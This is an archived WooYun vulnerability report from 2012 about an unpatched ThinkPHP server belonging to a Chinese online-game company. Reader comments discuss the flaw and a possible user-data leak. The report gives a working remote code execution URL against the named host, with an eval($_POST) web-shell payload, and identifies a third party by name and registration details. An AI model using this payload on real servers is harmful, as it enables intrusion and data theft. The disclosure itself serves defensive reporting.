当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08584

漏洞标题:国内某知名网游服务器严重隐患。。

相关厂商:华夏飞讯

漏洞作者: zeracker

提交时间:2012-06-21 17:02

修复时间:2012-08-05 17:03

公开时间:2012-08-05 17:03

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国内某知名网游服务器严重隐患。。
已被挂黑链。
显然是没有一个安全人员啊。
安全体系有问题!
不多说,命令执行。

详细说明:

华夏飞讯
北京华夏飞讯科技有限公司 China Cyber Games(以下简称:华夏飞讯 CCG)是大中华地区技术研发实力最强的互联网数字内容提供商。拥有跨平台云服务技术,3D/2D大型游戏引擎,动作、语音识别技术等数十项核心技术的自主知识产权。华夏飞讯的企业使命是成为全球第一的互联网内容提供商,改变人类的娱乐生活方式。 
http://sg.hxfx.cn/index.php/module/action/param1/${@eval%28$_POST[301]%29}
囧。还是thinkphp的老洞了,你们都没人管理的。遗憾。
后续能做什么,我就不说了。
黑链地址http://www.vmvmvm.com  以前好像是开黑站的,6月份才上线的电影站。
ICP备案主体信息           
 备案/许可证号: 苏ICP备09051387号 审核通过时间: 2011-07-04 
主办单位名称: 常州首码计算机有限公司  主办单位性质: 企业  
   
  
   
 ICP备案网站信息           
 网站名称: 常州首码计算机有限公司 网站首页网址: www.czvision.com.cn 
网站负责人姓名: 陈山  网站域名: vmvmvm.com WHOIS IP 
czvision.com.cn WHOIS IP 
苏ICP备09051387号 WHOIS IP  
网站备案/许可证号: 苏ICP备09051387号-1 网站前置审批项: 
 
具体是谁,这个就多说了

漏洞证明:













修复方案:

加强安全体系,及时打补丁,
建议来乌云上收个白帽子回去。

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2012-06-21 17:35 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    site:xxx filetype:action

  2. 2012-06-21 17:48 | 自由与精神 ( 路人 | Rank:30 漏洞数:5 | 缺乏精神力量,但我向往自由)

    @_Evil action? struct?

  3. 2012-06-21 20:09 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    像这样子怎么认领领啊?

  4. 2012-06-21 22:40 | 自由与精神 ( 路人 | Rank:30 漏洞数:5 | 缺乏精神力量,但我向往自由)

    求struct工具

  5. 2012-06-22 00:52 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    。。。。。。

  6. 2012-06-23 19:02 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    @自由与精神 struts吧···

  7. 2012-06-25 01:29 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    应该算我最早找到的,100W用户不多,带身份证

  8. 2012-06-25 01:33 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @also 你是想出名还是???100W网游用户数据,已经达到特大安全事故的标准了。我可没说数据上的东西。你既然有真相。后果,那就不说了

  9. 2012-06-25 01:44 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    @zeracker 蛋定,某群看到的,不多说

  10. 2012-08-06 09:46 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    超无语..明明是thinkphp,ls那么多讨论struts的

  11. 2012-08-06 10:05 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @saline 没公布前,让他们猜吧。

  12. 2012-08-06 10:46 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    @zeracker 你太坏了..

  13. 2012-08-18 00:40 | DDT ( 路人 | Rank:15 漏洞数:6 | hmmm...)

    还没修,这厂家。。